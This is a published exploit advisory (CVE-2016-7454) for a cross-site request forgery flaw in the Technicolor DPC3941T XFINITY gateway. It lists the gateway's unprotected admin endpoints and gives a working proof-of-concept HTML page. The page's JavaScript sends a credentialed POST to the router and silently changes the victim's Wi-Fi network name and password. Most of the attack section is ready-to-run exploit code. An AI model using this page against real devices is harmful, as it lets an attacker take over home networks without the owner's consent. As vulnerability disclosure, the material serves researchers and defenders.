XFINITY Gateway Technicolor DPC3941T Cross Site Request Forgery

2016-12-12T00:00:00
ID PACKETSTORM:140121
Type packetstorm
Reporter Ayushman Dutta
Modified 2016-12-12T00:00:00

Description

                                        
                                            `# Exploit Title: CSRF XFINITY Gateway product Technicolor(previously Cisco)  
DPC3941T  
# Date: 12/12/2016  
# Exploit Author: Ayushman Dutta  
# Version: dpc3941-P20-18-v303r20421733-160413a-CMCST  
# CVE : CVE-2016-7454  
  
The Device DPC3941T is vulnerable to CSRF and has no security on the entire  
admin panel for it.  
Some of the links are at:  
  
<IP Address>/actionHandler/ajax_remote_management.php  
<IP Address>/actionHandler/ajaxSet_wireless_network_configuration_edit.php  
<IP Address>/actionHandler/ajax_network_diagnostic_tools.php  
<IP Address>/actionHandler/ajax_at_a_glance.php  
  
A simple HTML page with javascript on which the attacker lures the victim  
can be used to change state in the application.  
  
<html>  
<head>  
<title>  
Lets CSRF Xfinity to change Wifi Password  
</title>  
</head>  
<script>  
function jsonreq() {  
var json_upload = "configInfo=" + JSON.stringify({"radio_enable":"true",  
"network_name":"MyName", "wireless_mode":"a,n,ac",  
"security":"WPAWPA2_PSK_TKIPAES",  
"channel_automatic":"true", "channel_number":"40",  
"network_password":"password", "broadcastSSID":"true", "enableWMM":"true",  
"ssid_number":"1"});  
var xmlhttp = new XMLHttpRequest();  
xmlhttp.withCredentials = true;  
xmlhttp.open("POST","http://10.0.0.1/actionHandler/ajaxSet_wireless_network_  
configuration_edit.php", true);  
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-  
urlencoded");  
xmlhttp.send(json_upload);  
}  
jsonreq();  
</script>  
</html>  
`